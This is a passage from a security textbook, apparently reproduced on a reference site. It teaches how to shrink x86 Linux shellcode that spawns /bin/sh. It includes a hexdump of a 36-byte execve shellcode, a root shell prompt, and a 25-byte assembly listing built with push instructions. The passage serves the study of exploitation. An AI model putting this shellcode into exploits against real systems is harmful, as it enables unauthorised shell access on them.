Graphics Programs Reference
In-Depth Information
sh-3.2# whoami
root
s
h-3.2#
This shellcode, however, can be shortened to less than the current
45 bytes. Since shellcode needs to be injected into program memory some-
where, smaller shellcode can be used in tighter exploit situations with smaller
usable buffers. The smaller the shellcode, the more situations it can be used
in. Obviously, the
XAAAABBBB
visual aid can be trimmed from the end of the
string, which brings the shellcode down to 36 bytes.
reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|
00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
r
eader@hacking:~/booksrc/shellcodes $
This shellcode can be shrunk down further by redesigning it and using
registers more efficiently. The ESP register is the stack pointer, pointing to
the top of the stack. When a value is pushed to the stack, ESP is moved up in
memory (by subtracting 4) and the value is placed at the top of the stack.
When a value is popped from the stack, the pointer in ESP is moved down in
memory (by adding 4).
The following shellcode uses
push
instructions to build the necessary
structures in memory for the
execve()
system call.
tiny_shell.s
BITS 32
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax.
push eax ; Push some nulls for string termination.
push 0x68732f2f ; Push "//sh" to the stack.
push 0x6e69622f ; Push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.
push eax ; Push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; Push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
mov al, 11 ; Syscall #11.
int 0x80 ; Do it.
This shellcode builds the null-terminated string
"/bin//sh"
on the stack,
and then copies ESP for the pointer. The extra backslash doesn't matter and
is effectively ignored. The same method is used to build the arrays for the
remaining arguments. The resulting shellcode still spawns a shell but is only
25 bytes, compared to 36 bytes using the
jmp
call method.
